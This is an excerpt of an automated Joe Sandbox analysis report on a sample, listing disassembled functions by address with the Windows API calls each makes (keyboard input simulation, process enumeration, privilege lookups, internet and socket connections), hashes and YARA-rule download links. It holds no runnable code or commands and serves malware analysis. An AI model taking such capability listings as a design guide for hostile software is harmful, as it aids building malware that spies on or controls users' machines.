Instruction ID: 12ac0fe647402a1d290cb3fec9448ec7578fd379a7ba47af81651f70b87f5fbd
Opcode Fuzzy Hash: 10a9512b5f329dd79094671146d23832bcdc6eadaade95be2e1a4d3f4643bfd9
Instruction Fuzzy Hash: 1AA17C356047019FCB11EF18C581B2AB7E4BF89314F04446EF99AAB3A2DB34ED05CB86

Function 003E687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 003E688E
SysAllocString.OLEAUT32(00000000), ref: 003E6937
VariantCopy.OLEAUT32 ref: 003E6966
VariantClear.OLEAUT32(?), ref: 003E698D

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 61f95c48151254a6398ef9c83d8b71222a74ee28aee0d9440b5d2a74fcef6012
Instruction ID: 35def3fc6057051d11a97138bfb1021df743ce63d2132bc37fa09035483ad032
Opcode Fuzzy Hash: 61f95c48151254a6398ef9c83d8b71222a74ee28aee0d9440b5d2a74fcef6012
Instruction Fuzzy Hash: 0851FA74B003919EDF26AF66C89267EB7E89F24350F20D92FE546DB6D1DB30D8408701

Function 004197F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(012EEB00,?), ref: 00419863
ScreenToClient.USER32(00000002,00000002), ref: 00419896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00419903

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 0e96c33d5adf64289bbeaa3b944b2a138299126988eeeec40443d69e7c495111
Instruction ID: 8644aceb3a2bda4366f5c09760f658f7663e9225b8a11597a70c9af1c08a7f10
Opcode Fuzzy Hash: 0e96c33d5adf64289bbeaa3b944b2a138299126988eeeec40443d69e7c495111
Instruction Fuzzy Hash: 9F514C74A10209AFCF14DF64C890AEE7BB5FF45360F10816AF8659B3A0D734AD81CB94

Function 003E9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 003E9AD2
__itow.LIBCMT ref: 003E9B03

Part of subcall function 003E9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 003E9DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 003E9B6C
__itow.LIBCMT ref: 003E9BC3

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: d13eb9b01736d599e0ade35529e86cafa0d7dbad53793f2ce1c71f4171dd3618
Instruction ID: 6be4de84c84bc2d82018923045a8a763fb6b9a898b23fe8a73724fca80cfe662
Opcode Fuzzy Hash: d13eb9b01736d599e0ade35529e86cafa0d7dbad53793f2ce1c71f4171dd3618
Instruction Fuzzy Hash: 2B418170A00359ABDF26EF55D845BFE7BB9EF44710F00006AF905AB2D1DB709A44CBA1

Function 004069AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 004069D1
WSAGetLastError.WSOCK32(00000000), ref: 004069E1

Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00406A45
WSAGetLastError.WSOCK32(00000000), ref: 00406A51

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 19c4f94c8908a18a5379ee24b7b76915885357dcfe69516a4d2c8082bcce6993
Instruction ID: d80ded981225c3e5c40cae412e90d49e6499c0fe0f96cfcb4422fc9c5495402c
Opcode Fuzzy Hash: 19c4f94c8908a18a5379ee24b7b76915885357dcfe69516a4d2c8082bcce6993
Instruction Fuzzy Hash: 8C41AF747002006FEB22BF28CC87F7A77E49B45B10F04802DFA19AF2C2DA749D018B95

Function 0040641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0041F910), ref: 004064A7
_strlen.LIBCMT ref: 004064D9

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 4796bd86a4d11bf109db6679b08074bd5665a6a72bba3babc0b10911468a4c3c
Instruction ID: c06998eac823925074b180e6cae52c14cb4a66d44822ec18c32a1e435468fb8f
Opcode Fuzzy Hash: 4796bd86a4d11bf109db6679b08074bd5665a6a72bba3babc0b10911468a4c3c
Instruction Fuzzy Hash: 0841DA31600104ABCB15FB68EC96FBEB7A9AF44314F10816AF816AF2D2DB34ED15C755

Function 003FB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 003FB89E
GetLastError.KERNEL32(?,00000000), ref: 003FB8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 003FB8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 003FB915

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 130d80c35a4f91e36ddb57e1b0fe50b93ae6506758f6f961c93dc05baa9e9193
Instruction ID: e78c66382b0b3c2333ee2c9d35a1151bc0027092ab72d0d17930606ec10534ec
Opcode Fuzzy Hash: 130d80c35a4f91e36ddb57e1b0fe50b93ae6506758f6f961c93dc05baa9e9193
Instruction Fuzzy Hash: 68413839600614DFCF12EF18C485A69BBE5AF8A310F098099ED4A9F362DB35FD01CB91

Function 00418851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004188DE

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 4e8b8e048d1187b2705a4e4c9fc75d535981940c3a3f6b744b79ee387b7dd084
Instruction ID: 5f36717300cbb4adb945c7030bba80afd0dd79cf3eace82bbd4b477b4aa8ad4b
Opcode Fuzzy Hash: 4e8b8e048d1187b2705a4e4c9fc75d535981940c3a3f6b744b79ee387b7dd084
Instruction Fuzzy Hash: 2F31D474650108BFEF20AA58CC45BFA77A5EB06350F54411BF911E62A1CE38E9C19B5F

Function 0041AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0041AB60
GetWindowRect.USER32(?,?), ref: 0041ABD6
PtInRect.USER32(?,?,0041C014), ref: 0041ABE6
MessageBeep.USER32(00000000), ref: 0041AC57

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: b2dd7f6649854848ddcebecebb519b3638b432af49f27d39ba09c380627f9447
Instruction ID: dbce62e261c9e36ba6b8b0d6888804ab745e758cb65bb55ae6a96a439b9ab60f
Opcode Fuzzy Hash: b2dd7f6649854848ddcebecebb519b3638b432af49f27d39ba09c380627f9447
Instruction Fuzzy Hash: 98418230601219DFCB11DF58D884BE977F6FB45315F18807AE5149B361E734E8A1CB9A

Function 003F0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 003F0B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 003F0B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 003F0BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 003F0BFB

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 49e680f4858974ee3be8a121b3ca4eb1d949c04df542bfc0ca736d1cd8efb09d
Instruction ID: 2b894523cc36fef9b15deba9dcef726b62fa1eee153a22a8049abed87aaf6745
Opcode Fuzzy Hash: 49e680f4858974ee3be8a121b3ca4eb1d949c04df542bfc0ca736d1cd8efb09d
Instruction Fuzzy Hash: 17315A70D4021CAEFF3A8B2D8C05BFABBAAAB45318F04836AE690561D3C3B5CD459755

Function 003F0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 003F0C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 003F0C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 003F0CE1
SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 003F0D33

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 536645d0328806458549c3046239d09a558154f5ddb1fbbed65b79247b3d73a4
Instruction ID: 0693f83e94c06f25406060fd130d0ce43ff284a712e0b2378eb892bfcd45bd8d
Opcode Fuzzy Hash: 536645d0328806458549c3046239d09a558154f5ddb1fbbed65b79247b3d73a4
Instruction Fuzzy Hash: 8231693094021CAEFF3A8B6D8C147FEBBAAAB45320F04832AF6945A1D3C3799D458751

Function 003C61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 003C61FB
__isleadbyte_l.LIBCMT ref: 003C6229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003C6257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 003C628D

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 7d7fd72d4b3ccf17b91826b300b324f94155eb2fb283a0c2470154bb9fe739e1
Instruction ID: 27733bb4b97d3138308237218b9a6bd20adc198bb940658f4dc9d19efc9ed6d4
Opcode Fuzzy Hash: 7d7fd72d4b3ccf17b91826b300b324f94155eb2fb283a0c2470154bb9fe739e1
Instruction Fuzzy Hash: BD31C130604246AFDF228F65CC4AFAA7BA9FF41310F16442DE864CB1A1D731DD50D790

Function 00414EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00414F02

Part of subcall function 003F3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 003F365B
Part of subcall function 003F3641: GetCurrentThreadId.KERNEL32 ref: 003F3662
Part of subcall function 003F3641: AttachThreadInput.USER32(00000000,?,003F5005), ref: 003F3669

GetCaretPos.USER32(?), ref: 00414F13
ClientToScreen.USER32(00000000,?), ref: 00414F4E
GetForegroundWindow.USER32 ref: 00414F54

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 2a923ce8a2afb57d7d9fb7662b75d5564724f67985a64c3dd9dc4cc460b3d06a
Instruction ID: fa087713875643d50b03f6500f515ba0dc023f1765da1bc8af1520bd67a4b60d
Opcode Fuzzy Hash: 2a923ce8a2afb57d7d9fb7662b75d5564724f67985a64c3dd9dc4cc460b3d06a
Instruction Fuzzy Hash: 2D313E71E00108AFCB01EFA9C885EEFB7FDEF99300F10406AE415E7241EA759E458BA1

Function 003F3C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 003F3C7A
Process32FirstW.KERNEL32(00000000,?), ref: 003F3C88
Process32NextW.KERNEL32(00000000,?), ref: 003F3CA8
CloseHandle.KERNEL32(00000000), ref: 003F3D52

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 4fdf3a8807b42d197406f49b46198c1e66783ded4ddebf1fca2bebc839b3ec78
Instruction ID: e6ba6e379aeb8999e52a57b5bd221668d3b186616772bcc9bf4492fe01093d51
Opcode Fuzzy Hash: 4fdf3a8807b42d197406f49b46198c1e66783ded4ddebf1fca2bebc839b3ec78
Instruction Fuzzy Hash: C931A0311083099FD702EF60C881ABFBBE8EF95354F50082DF5818A1A1EB719A49CB92

Function 0041C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00392612: GetWindowLongW.USER32(?,000000EB), ref: 00392623

GetCursorPos.USER32(?), ref: 0041C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,003CB9AB,?,?,?,?,?), ref: 0041C4E7
GetCursorPos.USER32(?), ref: 0041C534
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,003CB9AB,?,?,?), ref: 0041C56E

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 827c377fb969d15b3bf7d1f0b78a2334a9b59a581ab2d418d4f65fe15189e25f
Instruction ID: c643ec678fca61fdabf78c9391e3a8d99267af7e3aa30e57c0907ffeed414a77
Opcode Fuzzy Hash: 827c377fb969d15b3bf7d1f0b78a2334a9b59a581ab2d418d4f65fe15189e25f
Instruction Fuzzy Hash: 4C318E35600428FFCB159F58DC98EEB7BB6EB09310F44406AF9058B362C735A991DBA8

Function 003E8656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 003E810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003E8121
Part of subcall function 003E810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003E812B
Part of subcall function 003E810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003E813A
Part of subcall function 003E810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003E8141
Part of subcall function 003E810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003E8157

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 003E86A3
_memcmp.LIBCMT ref: 003E86C6
GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E86FC
HeapFree.KERNEL32(00000000), ref: 003E8703

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: f9b2b85b320c9ba41e6e435da744d715d2c90f1d3cdb518f57a5cdb3bc76d0f8
Instruction ID: 9577bbc1ec1e6b8beb31ecc8454ab5c1193cfa2f7c62618b3743abd323de7a34
Opcode Fuzzy Hash: f9b2b85b320c9ba41e6e435da744d715d2c90f1d3cdb518f57a5cdb3bc76d0f8
Instruction Fuzzy Hash: A121B371E40158EFDB11DFA6C949BEEB7B8FF44308F158159E548AB280DB30AE05CB50

Function 003B098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 003B09AE

Part of subcall function 00395A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,003F7896,?,?,00000000), ref: 00395A2C
Part of subcall function 00395A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,003F7896,?,?,00000000,?,?), ref: 00395A50

_fprintf.LIBCMT ref: 003B09E5
OutputDebugStringW.KERNEL32(?), ref: 003E5DBB

Part of subcall function 003B4AAA: _flsall.LIBCMT ref: 003B4AC3

__setmode.LIBCMT ref: 003B0A1A

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: 8ad472ba2318dabf8dfb52272ffbdee92f0c649cfab1f52d1814186654a765e8
Instruction ID: 4e14ce897227a772d3d9a8c030b376fdd8697175f30821176b4ad2b50f7f39ca
Opcode Fuzzy Hash: 8ad472ba2318dabf8dfb52272ffbdee92f0c649cfab1f52d1814186654a765e8
Instruction Fuzzy Hash: B1112731A046086FDB0BB3B89C47AFE776C9F46324F20015AF3049A593EE21584687A9

Function 00401767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004017A3

Part of subcall function 0040182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0040184C
Part of subcall function 0040182D: InternetCloseHandle.WININET(00000000), ref: 004018E9

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 42b1015ef1cdaea258b5e1e0855236d44aa1b973caba26e1614e9adb7b46fb3c
Instruction ID: 6009a6cf74544879c8bae27a1e974c2d83936ee304ced4820f6b80f8c94931c9
Opcode Fuzzy Hash: 42b1015ef1cdaea258b5e1e0855236d44aa1b973caba26e1614e9adb7b46fb3c
Instruction Fuzzy Hash: 1721C236200601BFEB129F608C00FBBBBA9FF48710F10803FF915A66E0D775991197A8

Function 003F3A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0041FAC0), ref: 003F3A64
GetLastError.KERNEL32 ref: 003F3A73
